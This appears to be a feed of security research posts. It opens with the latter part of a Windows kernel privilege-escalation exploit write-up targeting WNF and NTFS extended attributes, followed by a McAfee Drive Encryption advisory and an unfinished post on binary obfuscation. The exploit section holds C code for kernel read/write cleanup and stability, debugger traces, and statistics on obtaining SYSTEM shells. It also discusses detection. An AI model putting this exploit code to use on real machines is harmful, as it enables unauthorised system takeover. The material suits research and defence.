fffff804`502f1bb5 0fba68080d      bts     dword ptr [rax+8],0Dh
0: kd> kv
 # Child-SP          RetAddr           : Args to Child                                                           : Call Site
00 ffff8583`c6259c90 fffff804`502f0689 : 00000195`b24ec500 00000000`00000000 00000000`00000428 00007ff6`00000000 : nt!PspLocateInPEManifest+0xa9
01 ffff8583`c6259d00 fffff804`501f19d0 : 00000000`000022aa ffff8583`c625a350 00000000`00000000 00000000`00000000 : nt!PspSetupUserProcessAddressSpace+0xdd
02 ffff8583`c6259db0 fffff804`5021ca6d : 00000000`00000000 ffff8583`c625a350 00000000`00000000 00000000`00000000 : nt!PspAllocateProcess+0x11a4
03 ffff8583`c625a2d0 fffff804`500058b5 : 00000000`00000002 00000000`00000001 00000000`00000000 00000195`b24ec560 : nt!NtCreateUserProcess+0x6ed
04 ffff8583`c625aa90 00007ffd`b35cd6b4 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiSystemServiceCopyEnd+0x25 (TrapFrame @ ffff8583`c625ab00)
05 0000008c`c853e418 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!NtCreateUserProcess+0x14
```

More research needs to be performed to determine if this is necessary on prior versions or if this was a recently introduced change.

This can be fixed simply by using our NtWriteVirtualMemory APIs to restore the PreviousMode value to 1 before launching the cmd.exe shell.
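
A sketch of that restoration (NtWriteVirtualMemory is resolved from ntdll; kthread and the 0x232 offset were recovered earlier):

```c
// Must be the final kernel write we perform: once PreviousMode is back to
// UserMode (1), Nt*VirtualMemory re-applies the user-mode address checks.
BYTE userMode = 1;
NtWriteVirtualMemory(GetCurrentProcess(), (PVOID)(kthread + 0x232),
                     &userMode, sizeof(userMode), NULL);
```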

StateData Pointer Restoration

The _WNF_STATE_DATA StateData pointer is freed when the _WNF_NAME_INSTANCE is freed on process termination (incidentally, also an arbitrary free). If this is not restored to the original value, we will end up with a crash as follows:

00 ffffdc87`2a708cd8 fffff807`27912082 : ffffdc87`2a708e40 fffff807`2777b1d0 00000000`00000100 00000000`00000000 : nt!DbgBreakPointWithStatus
01 ffffdc87`2a708ce0 fffff807`27911666 : 00000000`00000003 ffffdc87`2a708e40 fffff807`27808e90 00000000`0000013a : nt!KiBugCheckDebugBreak+0x12
02 ffffdc87`2a708d40 fffff807`277f3fa7 : 00000000`00000003 00000000`00000023 00000000`00000012 00000000`00000000 : nt!KeBugCheck2+0x946
03 ffffdc87`2a709450 fffff807`2798d938 : 00000000`0000013a 00000000`00000012 ffffa409`6ba02100 ffffa409`7120a000 : nt!KeBugCheckEx+0x107
04 ffffdc87`2a709490 fffff807`2798d998 : 00000000`00000012 ffffdc87`2a7095a0 ffffa409`6ba02100 fffff807`276df83e : nt!RtlpHeapHandleError+0x40
05 ffffdc87`2a7094d0 fffff807`2798d5c5 : ffffa409`7120a000 ffffa409`6ba02280 ffffa409`6ba02280 00000000`00000001 : nt!RtlpHpHeapHandleError+0x58
06 ffffdc87`2a709500 fffff807`2786667e : ffffa409`71293280 00000000`00000001 00000000`00000000 ffffa409`6f6de600 : nt!RtlpLogHeapFailure+0x45
07 ffffdc87`2a709530 fffff807`276cbc44 : 00000000`00000000 ffffb504`3b1aa7d0 00000000`00000000 ffffb504`00000000 : nt!RtlpHpVsContextFree+0x19954e
08 ffffdc87`2a7095d0 fffff807`27db2019 : 00000000`00052d20 ffffb504`33ea4600 ffffa409`712932a0 01000000`00100000 : nt!ExFreeHeapPool+0x4d4        
09 ffffdc87`2a7096b0 fffff807`27a5856b : ffffb504`00000000 ffffb504`00000000 ffffb504`3b1ab020 ffffb504`00000000 : nt!ExFreePool+0x9
0a ffffdc87`2a7096e0 fffff807`27a58329 : 00000000`00000000 ffffa409`712936d0 ffffa409`712936d0 ffffb504`00000000 : nt!ExpWnfDeleteStateData+0x8b
0b ffffdc87`2a709710 fffff807`27c46003 : ffffffff`ffffffff ffffb504`3b1ab020 ffffb504`3ab0f780 00000000`00000000 : nt!ExpWnfDeleteNameInstance+0x1ed
0c ffffdc87`2a709760 fffff807`27b0553e : 00000000`00000000 ffffdc87`2a709990 00000000`00000000 00000000`00000000 : nt!ExpWnfDeleteProcessContext+0x140a9b
0d ffffdc87`2a7097a0 fffff807`27a9ea7f : ffffa409`7129d080 ffffb504`336506a0 ffffdc87`2a709990 00000000`00000000 : nt!ExWnfExitProcess+0x32
0e ffffdc87`2a7097d0 fffff807`279f4558 : 00000000`c000013a 00000000`00000001 ffffdc87`2a7099e0 00000055`8b6d6000 : nt!PspExitThread+0x5eb
0f ffffdc87`2a7098d0 fffff807`276e6ca7 : 00000000`00000000 00000000`00000000 00000000`00000000 fffff807`276f0ee6 : nt!KiSchedulerApcTerminate+0x38
10 ffffdc87`2a709910 fffff807`277f8440 : 00000000`00000000 ffffdc87`2a7099c0 ffffdc87`2a709b80 ffffffff`00000000 : nt!KiDeliverApc+0x487
11 ffffdc87`2a7099c0 fffff807`2780595f : ffffa409`71293000 00000251`173f2b90 00000000`00000000 00000000`00000000 : nt!KiInitiateUserApc+0x70
12 ffffdc87`2a709b00 00007ff9`18cabe44 : 00007ff9`165d26ee 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiSystemServiceExit+0x9f (TrapFrame @ ffffdc87`2a709b00)
13 00000055`8b8ffb28 00007ff9`165d26ee : 00000000`00000000 00000000`00000000 00000000`00000000 00007ff9`18c5a800 : ntdll!NtWaitForSingleObject+0x14
14 00000055`8b8ffb30 00000000`00000000 : 00000000`00000000 00000000`00000000 00007ff9`18c5a800 00000000`00000000 : 0x00007ff9`165d26ee

Although we could restore this using the WNF relative read/write, as we now have arbitrary read and write using the APIs, we can instead implement a function which uses a previously saved ScopeInstance pointer to search for the StateName of our targeted _WNF_NAME_INSTANCE and recover its address.

Visually this looks as follows:

Some example code for this is:

/**
* This function returns back the address of a _WNF_NAME_INSTANCE looked up by its internal StateName
* It performs an _RTL_AVL_TREE tree walk against the sorted tree of _WNF_NAME_INSTANCES. 
* The tree root is at _WNF_SCOPE_INSTANCE+0x38 (NameSet)
**/
QWORD* FindStateName(unsigned __int64 StateName)
{
    QWORD* i;
    
    // _WNF_SCOPE_INSTANCE+0x38 (NameSet)
    for (i = (QWORD*)read64((char*)BackupScopeInstance+0x38); ; i = (QWORD*)read64((char*)i + 0x8))
    {

        while (1)
        {
            if (!i)
                return 0;

            // StateName is 0x18 after the TreeLinks FLINK
            QWORD CurrStateName = (QWORD)read64((char*)i + 0x18);

            if (StateName >= CurrStateName)
                break;

            i = (QWORD*)read64(i);
        }
        QWORD CurrStateName = (QWORD)read64((char*)i + 0x18);

        if (StateName <= CurrStateName)
            break; 
    }
    return (QWORD*)((QWORD*)i - 2);
}

Then once we have obtained our _WNF_NAME_INSTANCE, we can restore the original StateData pointer.
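
For example, with hypothetical variables holding the internal StateName and original StateData pointer saved during stage 2:

```c
// Look the instance back up by its internal StateName and put the original
// StateData pointer back at +0x58.
QWORD *instance = FindStateName(SavedInternalStateName);
if (instance)
    write64((char *)instance + 0x58, OriginalStateData);
```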

RunRef Restoration

The next crash encountered was related to the fact that we may have corrupted the RunRef member of many _WNF_NAME_INSTANCEs in the process of obtaining our unbounded _WNF_STATE_DATA. When ExReleaseRundownProtection is called and an invalid value is present, we will crash as follows:

1: kd> kv
 # Child-SP          RetAddr           : Args to Child                                                           : Call Site
00 ffffeb0f`0e9e5bf8 fffff805`2f512082 : ffffeb0f`0e9e5d60 fffff805`2f37b1d0 00000000`00000000 00000000`00000000 : nt!DbgBreakPointWithStatus
01 ffffeb0f`0e9e5c00 fffff805`2f511666 : 00000000`00000003 ffffeb0f`0e9e5d60 fffff805`2f408e90 00000000`0000003b : nt!KiBugCheckDebugBreak+0x12
02 ffffeb0f`0e9e5c60 fffff805`2f3f3fa7 : 00000000`00000103 00000000`00000000 fffff805`2f0e3838 ffffc807`cdb5e5e8 : nt!KeBugCheck2+0x946
03 ffffeb0f`0e9e6370 fffff805`2f405e69 : 00000000`0000003b 00000000`c0000005 fffff805`2f242c32 ffffeb0f`0e9e6cb0 : nt!KeBugCheckEx+0x107
04 ffffeb0f`0e9e63b0 fffff805`2f4052bc : ffffeb0f`0e9e7478 fffff805`2f0e3838 ffffeb0f`0e9e65a0 00000000`00000000 : nt!KiBugCheckDispatch+0x69
05 ffffeb0f`0e9e64f0 fffff805`2f3fcd5f : fffff805`2f405240 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiSystemServiceHandler+0x7c
06 ffffeb0f`0e9e6530 fffff805`2f285027 : ffffeb0f`0e9e6aa0 00000000`00000000 ffffeb0f`0e9e7b00 fffff805`2f40595f : nt!RtlpExecuteHandlerForException+0xf
07 ffffeb0f`0e9e6560 fffff805`2f283ce6 : ffffeb0f`0e9e7478 ffffeb0f`0e9e71b0 ffffeb0f`0e9e7478 ffffa300`da5eb5d8 : nt!RtlDispatchException+0x297
08 ffffeb0f`0e9e6c80 fffff805`2f405fac : ffff521f`0e9e8ad8 ffffeb0f`0e9e7560 00000000`00000000 00000000`00000000 : nt!KiDispatchException+0x186
09 ffffeb0f`0e9e7340 fffff805`2f401ce0 : 00000000`00000000 00000000`00000000 ffffffff`ffffffff ffffa300`daf84000 : nt!KiExceptionDispatch+0x12c
0a ffffeb0f`0e9e7520 fffff805`2f242c32 : ffffc807`ce062a50 fffff805`2f2df0dd ffffc807`ce062400 ffffa300`da5eb5d8 : nt!KiGeneralProtectionFault+0x320 (TrapFrame @ ffffeb0f`0e9e7520)
0b ffffeb0f`0e9e76b0 fffff805`2f2e8664 : 00000000`00000006 ffffa300`d449d8a0 ffffa300`da5eb5d8 ffffa300`db013360 : nt!ExfReleaseRundownProtection+0x32
0c ffffeb0f`0e9e76e0 fffff805`2f658318 : ffffffff`00000000 ffffa300`00000000 ffffc807`ce062a50 ffffa300`00000000 : nt!ExReleaseRundownProtection+0x24
0d ffffeb0f`0e9e7710 fffff805`2f846003 : ffffffff`ffffffff ffffa300`db013360 ffffa300`da5eb5a0 00000000`00000000 : nt!ExpWnfDeleteNameInstance+0x1dc
0e ffffeb0f`0e9e7760 fffff805`2f70553e : 00000000`00000000 ffffeb0f`0e9e7990 00000000`00000000 00000000`00000000 : nt!ExpWnfDeleteProcessContext+0x140a9b
0f ffffeb0f`0e9e77a0 fffff805`2f69ea7f : ffffc807`ce0700c0 ffffa300`d2c506a0 ffffeb0f`0e9e7990 00000000`00000000 : nt!ExWnfExitProcess+0x32
10 ffffeb0f`0e9e77d0 fffff805`2f5f4558 : 00000000`c000013a 00000000`00000001 ffffeb0f`0e9e79e0 000000f1`f98db000 : nt!PspExitThread+0x5eb
11 ffffeb0f`0e9e78d0 fffff805`2f2e6ca7 : 00000000`00000000 00000000`00000000 00000000`00000000 fffff805`2f2f0ee6 : nt!KiSchedulerApcTerminate+0x38
12 ffffeb0f`0e9e7910 fffff805`2f3f8440 : 00000000`00000000 ffffeb0f`0e9e79c0 ffffeb0f`0e9e7b80 ffffffff`00000000 : nt!KiDeliverApc+0x487
13 ffffeb0f`0e9e79c0 fffff805`2f40595f : ffffc807`ce062400 0000020b`04f64b90 00000000`00000000 00000000`00000000 : nt!KiInitiateUserApc+0x70
14 ffffeb0f`0e9e7b00 00007ff9`8314be44 : 00007ff9`80aa26ee 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiSystemServiceExit+0x9f (TrapFrame @ ffffeb0f`0e9e7b00)
15 000000f1`f973f678 00007ff9`80aa26ee : 00000000`00000000 00000000`00000000 00000000`00000000 00007ff9`830fa800 : ntdll!NtWaitForSingleObject+0x14
16 000000f1`f973f680 00000000`00000000 : 00000000`00000000 00000000`00000000 00007ff9`830fa800 00000000`00000000 : 0x00007ff9`80aa26ee

To restore these correctly we need to think about how these objects fit together in memory and how to obtain a full list of all _WNF_NAME_INSTANCES which could possibly be corrupt.

Within _EPROCESS we have a member WnfContext which is a pointer to a _WNF_PROCESS_CONTEXT.

This looks as follows:

nt!_WNF_PROCESS_CONTEXT
   +0x000 Header           : _WNF_NODE_HEADER
   +0x008 Process          : Ptr64 _EPROCESS
   +0x010 WnfProcessesListEntry : _LIST_ENTRY
   +0x020 ImplicitScopeInstances : [3] Ptr64 Void
   +0x038 TemporaryNamesListLock : _WNF_LOCK
   +0x040 TemporaryNamesListHead : _LIST_ENTRY
   +0x050 ProcessSubscriptionListLock : _WNF_LOCK
   +0x058 ProcessSubscriptionListHead : _LIST_ENTRY
   +0x068 DeliveryPendingListLock : _WNF_LOCK
   +0x070 DeliveryPendingListHead : _LIST_ENTRY
   +0x080 NotificationEvent : Ptr64 _KEVENT

As you can see there is a member TemporaryNamesListHead, a linked list which chains together the TemporaryNameListEntry members of each _WNF_NAME_INSTANCE created by the process.

Therefore, we can calculate the address of each of the _WNF_NAME_INSTANCES by iterating through the linked list using our arbitrary read primitives.

We can then determine if the Header or RunRef has been corrupted and restore each to a sane value which does not cause a BSOD (the original header value, and 0 for the RunRef).

An example of this is:

/**
* This function starts from the EPROCESS WnfContext which points at a _WNF_PROCESS_CONTEXT
* The _WNF_PROCESS_CONTEXT contains a TemporaryNamesListHead at 0x40 offset. 
* This linked list is then traversed to locate all _WNF_NAME_INSTANCES and the header and RunRef fixed up.
**/
void FindCorruptedRunRefs(LPVOID wnf_process_context_ptr)
{

    // +0x040 TemporaryNamesListHead : _LIST_ENTRY
    LPVOID first = read64((char*)wnf_process_context_ptr + 0x40);
    LPVOID ptr; 

    for (ptr = read64(read64((char*)wnf_process_context_ptr + 0x40)); ; ptr = read64(ptr))
    {
        if (ptr == first) return;

        // +0x088 TemporaryNameListEntry : _LIST_ENTRY
        QWORD* nameinstance = (QWORD*)ptr - 17;

        QWORD header = (QWORD)read64(nameinstance);
        
        if (header != 0x0000000000A80903)
        {
            // Fix the header up.
            write64(nameinstance, 0x0000000000A80903);
            // Fix the RunRef up.
            write64((char*)nameinstance + 0x8, 0);
        }
    }
}

NTOSKRNL Base Address

Whilst this isn’t actually needed by the exploit, I needed to obtain the NTOSKRNL base address to speed up some examination and debugging of the segment heap. With access to the EPROCESS/KPROCESS or ETHREAD/KTHREAD, the NTOSKRNL base address can be obtained from the kernel stack. By putting a newly created thread into the wait state, we can then walk the kernel stack for that thread and obtain the return address of a known function. Using this and a fixed offset we can calculate the NTOSKRNL base address. A similar technique was used within KernelForge.
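
A sketch of such a stack walk is below; the _KTHREAD StackBase (0x38) and KernelStack (0x58) offsets, and the known return site constants, are assumptions to resolve against the specific build:

```c
// Hypothetical constants: the page offset of a known return site (for
// example inside nt!KiSystemServiceCopyEnd) and its full offset from the
// NTOSKRNL image base for this build.
#define KNOWN_RET_PAGE_OFF 0x8b5
#define KNOWN_RET_OFF      0x4058b5

ULONG64 FindNtoskrnlBase(ULONG64 kthread)
{
    ULONG64 stackBase = (ULONG64)read64((char *)(kthread + 0x38)); // StackBase
    ULONG64 kstack    = (ULONG64)read64((char *)(kthread + 0x58)); // KernelStack

    for (ULONG64 p = kstack; p < stackBase; p += 8) {
        ULONG64 val = (ULONG64)read64((char *)p);
        // Only consider canonical kernel-mode addresses whose low 12 bits
        // match the known return site, then rebase to the image start.
        if (val >= 0xFFFF800000000000ULL &&
            (val & 0xFFF) == KNOWN_RET_PAGE_OFF)
            return val - KNOWN_RET_OFF;
    }
    return 0;
}
```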

The following output shows the thread whilst in the wait state:

0: kd> !thread ffffbc037834b080
THREAD ffffbc037834b080  Cid 1ed8.1f54  Teb: 000000537ff92000 Win32Thread: 0000000000000000 WAIT: (UserRequest) UserMode Non-Alertable
    ffffbc037d7f7a60  SynchronizationEvent
Not impersonating
DeviceMap                 ffff988cca61adf0
Owning Process            ffffbc037d8a4340       Image:         amberzebra.exe
Attached Process          N/A            Image:         N/A
Wait Start TickCount      3234           Ticks: 542 (0:00:00:08.468)
Context Switch Count      4              IdealProcessor: 1             
UserTime                  00:00:00.000
KernelTime                00:00:00.000
Win32 Start Address 0x00007ff6e77b1710
Stack Init ffffd288fe699c90 Current ffffd288fe6996a0
Base ffffd288fe69a000 Limit ffffd288fe694000 Call 0000000000000000
Priority 8 BasePriority 8 PriorityDecrement 0 IoPriority 2 PagePriority 5
Child-SP          RetAddr           : Args to Child                                                           : Call Site
ffffd288`fe6996e0 fffff804`818e4540 : fffff804`7d17d180 00000000`ffffffff ffffd288`fe699860 ffffd288`fe699a20 : nt!KiSwapContext+0x76
ffffd288`fe699820 fffff804`818e3a6f : 00000000`00000000 00000000`00000001 ffffd288`fe6999e0 00000000`00000000 : nt!KiSwapThread+0x500
ffffd288`fe6998d0 fffff804`818e3313 : 00000000`00000000 fffff804`00000000 ffffbc03`7c41d500 ffffbc03`7834b1c0 : nt!KiCommitThreadWait+0x14f
ffffd288`fe699970 fffff804`81cd6261 : ffffbc03`7d7f7a60 00000000`00000006 00000000`00000001 00000000`00000000 : nt!KeWaitForSingleObject+0x233
ffffd288`fe699a60 fffff804`81cd630a : ffffbc03`7834b080 00000000`00000000 00000000`00000000 00000000`00000000 : nt!ObWaitForSingleObject+0x91
ffffd288`fe699ac0 fffff804`81a058b5 : ffffbc03`7834b080 00000000`00000000 00000000`00000000 00000000`00000000 : nt!NtWaitForSingleObject+0x6a
ffffd288`fe699b00 00007ffc`c0babe44 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiSystemServiceCopyEnd+0x25 (TrapFrame @ ffffd288`fe699b00)
00000053`003ffc68 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!NtWaitForSingleObject+0x14

Exploit Testing and Statistics

As there are some elements of instability and non-determinism in this exploit, an exploit testing framework was developed to determine its effectiveness across multiple runs, on multiple supported platforms, and whilst varying the exploit parameters. Whilst this lab environment is not fully representative of a long-running operating system with other third party drivers etc. installed and a noisier kernel pool, it gives some indication that this approach is feasible, and also feeds into possible detection mechanisms.

The key variables which can be modified with this exploit are:

  • Spray size
  • Post-exploitation choices

All these are measured over 100 iterations of the exploit (over 5 runs) for a timeout duration of 15 seconds (i.e. a BSOD did not occur within 15 seconds of an execution of the exploit).

SYSTEM shells – Number of times a SYSTEM shell was launched.

Total LFH Writes – For all 100 runs of the exploit, how many corruptions were triggered.

Avg LFH Writes – Average number of LFH overflows needed to obtain a SYSTEM shell.

Failed after 32 – How many times the exploit failed to overflow an adjacent object of the required target type, by reaching the max number of overflow attempts. 32 was chosen as a semi-arbitrary value based on empirical testing and on the blocks in the BlockBitmap for the LFH being scanned in groups of 32 blocks.

BSODs on exec – Number of times the exploit BSOD the box on execution.

Unmapped Read – Number of times the relative read reaches unmapped memory (ExpWnfReadStateData) – included in the BSOD on exec count above.

Spray Size Variation

The following statistics show runs when varying the spray size.

Spray size 3000

Result             Run 1   Run 2   Run 3   Run 4   Run 5   Avg
SYSTEM shells         85      82      76      75      75    78
Total LFH writes     708     726     707     678     624   688
Avg LFH writes         8       8       9       9       8     8
Failed after 32        1       3       2       1       1     2
BSODs on exec         14      15      22      24      24    20
Unmapped Read          4       5       8       6      10     7

Spray size 6000

Result             Run 1   Run 2   Run 3   Run 4   Run 5   Avg
SYSTEM shells         84      80      78      84      79    81
Total LFH writes     674     643     696     762     706   696
Avg LFH writes         8       8       9       9       8     8
Failed after 32        2       4       3       3       4     3
BSODs on exec         14      16      19      13      17    16
Unmapped Read          2       4       4       5       4     4

Spray size 10000

Result             Run 1   Run 2   Run 3   Run 4   Run 5   Avg
SYSTEM shells         84      85      87      85      86    85
Total LFH writes     805     714     761     688     694   732
Avg LFH writes         9       8       8       8       8     8
Failed after 32        3       5       3       3       3     3
BSODs on exec         13      10      10      12      11    11
Unmapped Read          1       0       1       1       0     1

Spray size 20000

Result             Run 1   Run 2   Run 3   Run 4   Run 5   Avg
SYSTEM shells         89      90      94      90      90    91
Total LFH writes     624     763     657     762     650   691
Avg LFH writes         7       8       7       8       7     7
Failed after 32        3       2       1       2       2     2
BSODs on exec          8       8       5       8       8     7
Unmapped Read          0       0       0       0       1     0

From this we can see that increasing the spray size leads to a much decreased chance of hitting an unmapped read, and thus reduces the number of BSODs.

On average, the number of overflows needed to obtain the correct memory layout stayed roughly the same regardless of spray size.

Post Exploitation Method Variation

I also experimented with the post exploitation method used (token stealing vs modifying the existing token). The reason for this is that the token stealing method performs more kernel reads/writes, and there is a longer duration before PreviousMode is reverted.

20000 spray size

With all the _SEP_TOKEN_PRIVILEGES enabled:

Result             Run 1   Run 2   Run 3   Run 4   Run 5   Avg
PRIV shells           94      92      93      92      89    92
Total LFH writes     939     825     825     788     724   820
Avg LFH writes         9       8       8       8       8     8
Failed after 32        2       2       1       2       0     1
BSODs on exec          4       6       6       6      11     6
Unmapped Read          0       1       1       2       2     1

Therefore, there is only a negligible difference between these two methods.

Detection

After all of this is there anything we have learned which could help defenders?

Well, firstly a patch has been out for this vulnerability since the 8th of June 2021. If you're reading this and the patch is not applied, then there are obviously bigger problems with the patch management lifecycle to focus on 🙂

However, there are some engineering insights which can be gained from this, and from detecting memory corruption exploits in the wild in general. I will focus specifically on the vulnerability itself and this exploit, rather than the more generic post exploitation technique detection (token stealing etc.) which has been covered in many online articles. As I never had access to the in-the-wild exploit, these detection mechanisms may not be useful for that scenario. Regardless, this research should allow security researchers a greater understanding in this area.

The main artifacts from this exploit are:

  • NTFS Extended Attributes being created and queried.
  • WNF objects being created (as part of the spray)
  • Failed exploit attempts leading to BSODs

NTFS Extended Attributes

Firstly, examining the ETW framework for Windows, the provider Microsoft-Windows-Kernel-File was found to expose "SetEa" and "QueryEa" events.

This can be captured as part of an ETW trace:

As this vulnerability can be exploited at low integrity (and thus from a sandbox), the detection mechanisms would vary based on whether an attacker had local code execution or chained it together with a browser exploit.

One idea for endpoint detection and response (EDR) based detection would be that a browser renderer process executing both of these actions (in the case of using this exploit to break out of a browser sandbox) would warrant deeper investigation. For example, whilst loading a new tab and web page, the browser process "MicrosoftEdge.exe" triggers these events legitimately under normal operation, whereas the sandboxed renderer process "MicrosoftEdgeCP.exe" does not. Chrome, while loading a new tab and web page, did not trigger either of the events. I didn’t explore too deeply whether there were any render operations which could trigger this non-maliciously, but this provides a place where defenders can explore further.

WNF Operations

The second area investigated was to determine if there were any ETW events produced by WNF based operations. Looking through the "Microsoft-Windows-Kernel-*" providers I could not find any related events which would help in this area. Therefore, detecting the spray through any ETW logging of WNF operations did not seem feasible. This was expected due to the WNF subsystem not being intended for use by non-MS code.

Crash Dump Telemetry

Crash Dumps are a very good way to detect unreliable exploitation techniques, or cases where an exploit developer has inadvertently left their development system connected to a network. MS08-067 is a well known example of Microsoft using this to identify an 0day from their WER telemetry. That one was found by looking for shellcode; however, certain crashes are pretty suspicious when coming from production releases. Apple also seem to have added telemetry to iMessage for suspicious crashes.

In the case of this specific vulnerability being exploited with WNF, there is a slim chance (approx. <5%) that the following BSOD can occur, which could act as a detection artefact:

```
Child-SP          RetAddr           Call Site
ffff880f`6b3b7d18 fffff802`1e112082 nt!DbgBreakPointWithStatus
ffff880f`6b3b7d20 fffff802`1e111666 nt!KiBugCheckDebugBreak+0x12
ffff880f`6b3b7d80 fffff802`1dff3fa7 nt!KeBugCheck2+0x946
ffff880f`6b3b8490 fffff802`1e0869d9 nt!KeBugCheckEx+0x107
ffff880f`6b3b84d0 fffff802`1deeeb80 nt!MiSystemFault+0x13fda9
ffff880f`6b3b85d0 fffff802`1e00205e nt!MmAccessFault+0x400
ffff880f`6b3b8770 fffff802`1e006ec0 nt!KiPageFault+0x35e
ffff880f`6b3b8908 fffff802`1e218528 nt!memcpy+0x100
ffff880f`6b3b8910 fffff802`1e217a97 nt!ExpWnfReadStateData+0xa4
ffff880f`6b3b8980 fffff802`1e0058b5 nt!NtQueryWnfStateData+0x2d7
ffff880f`6b3b8a90 00007ffe`e828ea14 nt!KiSystemServiceCopyEnd+0x25
00000082`054ff968 00007ff6`e0322948 0x00007ffe`e828ea14
00000082`054ff970 0000019a`d26b2190 0x00007ff6`e0322948
00000082`054ff978 00000082`054fe94e 0x0000019a`d26b2190
00000082`054ff980 00000000`00000095 0x00000082`054fe94e
00000082`054ff988 00000000`000000a0 0x95
00000082`054ff990 0000019a`d26b71e0 0xa0
00000082`054ff998 00000082`054ff9b4 0x0000019a`d26b71e0
00000082`054ff9a0 00000000`00000000 0x00000082`054ff9b4
```

Under normal operation you would not expect a memcpy operation to fault accessing unmapped memory when triggered by the WNF subsystem. Whilst this telemetry might lead to attack attempts being discovered prior to an attacker obtaining code execution, once kernel code execution or SYSTEM has been gained, an attacker may just disable the telemetry or sanitise it afterwards, especially in cases where there could be system instability post exploitation. Windows 11 looks to have added additional ETW logging with these policy settings to determine scenarios when this is modified:

Windows 11 ETW events.

Conclusion

This article demonstrates some of the further lengths an exploit developer needs to go to in order to achieve more reliable and stable code execution beyond a simple POC.

At this point we now have an exploit which is much more successful, and less likely to cause instability on the target system, than a simple POC. However, we can only achieve approximately a 90% success rate due to the techniques used. This seems to be about the limit with this approach without using alternative exploit primitives. The article also gives some examples of potential ways to identify exploitation of this vulnerability and detection of memory corruption exploits in general.

Acknowledgements

Boris Larin, for discovering this 0day being exploited within the wild and the initial write-up.

Yan ZiShuang, for performing parallel research into exploitation of this vuln and blogging about it.

Alex Ionescu and Gabrielle Viala for the initial documentation of WNF.

Corentin Bayet, Paul Fariello, Yarden Shafir, Angelboy, Mark Yason for publishing their research into the Windows 10 Segment Pool/Heap.

Aaron Adams and Cedric Halbronn for doing multiple QA’s and discussions around this research.

✇NCC Group Research

Technical Advisory – NULL Pointer Derefence in McAfee Drive Encryption (CVE-2021-23893)

By: balazs.bucsay
Vendor: McAfee
Vendor URL: https://kc.mcafee.com/corporate/index?page=content&id=sb10361
Versions affected: Prior to 7.3.0 HF1
Systems Affected: Windows OSs without NULL page protection 
Author: Balazs Bucsay <balazs.bucsay[ at ]nccgroup[.dot.]com> @xoreipeip
CVE Identifier: CVE-2021-23893
Risk: 8.8 - CWE-269: Improper Privilege Management

Summary

McAfee’s Complete Data Protection package contained the Drive Encryption (DE) software. This software was used to transparently encrypt the drive contents. The versions prior to 7.3.0 HF1 had a vulnerability in the kernel driver MfeEpePC.sys that could be exploited on certain Windows systems for privilege escalation or DoS.

Impact

Privilege Escalation vulnerability in a Windows system driver of McAfee Drive Encryption (DE) prior to 7.3.0 could allow a local non-admin user to gain elevated system privileges via exploiting an unutilized memory buffer.

Details

The Drive Encryption software’s kernel driver was loaded to the kernel at boot time and certain IOCTLs were available for low-privileged users.

One of the available IOCTLs referenced an event that was set to NULL before initialization. If the IOCTL was called at the right time, the procedure used NULL as an event and referenced the non-existent structure on the NULL page.

If the user mapped the NULL page and created a fake structure there that mimicked a real Event structure, it was possible to manipulate certain regions of memory and eventually execute code in the kernel.

Recommendation

Install or update Disk Encryption 7.3.0 HF1, which has this vulnerability fixed.

Vendor Communication

February 24, 2021: Vulnerability was reported to McAfee

March 9, 2021: McAfee was able to reproduce the crash with the originally provided DoS exploit

October 1, 2021: McAfee released the new version of DE, which fixes the issue

Acknowledgements

Thanks to Cedric Halbronn for his support during the development of the exploit.

About NCC Group

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate & respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity. 

Published date:  October 4, 2021

Written by:  Balazs Bucsay

✇NCC Group Research

A Look At Some Real-World Obfuscation Techniques

By: Nicolas Guigo

Among the variety of penetration testing engagements NCC Group delivers, some – often within the gaming industry – require performing the assignment in a blackbox fashion against an obfuscated binary, and the client’s priorities revolve more around evaluating the strength of their obfuscation against content protection violations, rather than exercising the application’s security boundaries.

The following post aims at providing insight into the tools and methods used to conduct those engagements using real-world examples. While this approach allows for describing techniques employed by actual protections, only a subset of the material can be explicitly listed here (see disclaimer for more information).

Unpacking Phase

When first attempting to analyze a hostile binary, the first step is generally to unpack the actual contents of its sections from runtime memory. The standard way to proceed consists of letting the executable run until the unpacking stub has finished deobfuscating, decompressing and/or deciphering the executable’s sections. The unpacked binary can then be reconstructed by dumping the recovered sections into a new executable and (usually) rebuilding the imports section from the recovered IAT (Import Address Table).

This can be accomplished in many ways including:

  • Debugging manually and using plugins such as Scylla to reconstruct the imports section
  • Python scripting leveraging Windows debugging libraries like winappdbg and executable file format libraries like pefile
  • Intel Pintools dynamically instrumenting the binary at run-time (JIT instrumentation mode recommended to avoid integrity checks)

Expectedly, these approaches can be thwarted by anti-debug mechanisms and various detection mechanisms which, in turn, can be evaded via more debugger plugins such as ScyllaHide or by implementing various hooks such as those highlighted by ICPin. Finally, the original entry point of the application can usually be identified by its immediate calls to the C++ language’s canonical internal initialization functions such as _initterm() and _initterm_e().

While the dynamic method is usually sufficient, the samples below highlight automated implementations that were successfully used: a Python script to handle a simple packer that did not require import rebuilding, and a versatile (albeit slower) dynamic execution engine implementation allowing a more granular approach, fit to uncover specific behaviors.

Control Flow Flattening

Once unpacked, the binary under investigation exposes a number of functions obfuscated using control flow graph (CFG) flattening, a variety of antidebug mechanisms, and integrity checks. Those can be identified as a preliminary step by running the binary instrumented under ICPin (sample output below).

Overview

When disassembled, the CFG of each obfuscated function exhibits the pattern below: a state variable has been added to the original flow, which gets initialized in the function prologue and the branching structure has been replaced by a loop of pointer table-based dispatchers (highlighted in white).

Each dispatch loop level contains between 2 and 16 indirect jumps to basic blocks (BBLs) actually implementing the function’s logic.

There are a number of ways to approach this problem, but the CFG flattening implemented here can be handled using a fully symbolic approach that does not require a dynamic engine, nor a real memory context. The first step is, for each function, to identify the loop using a loop-matching algorithm, then run a symbolic engine through it, iterating over all the possible index values and building an index-to-offset map, with the original function’s logic implemented within the BBL-chains located between the blocks belonging to the loop:
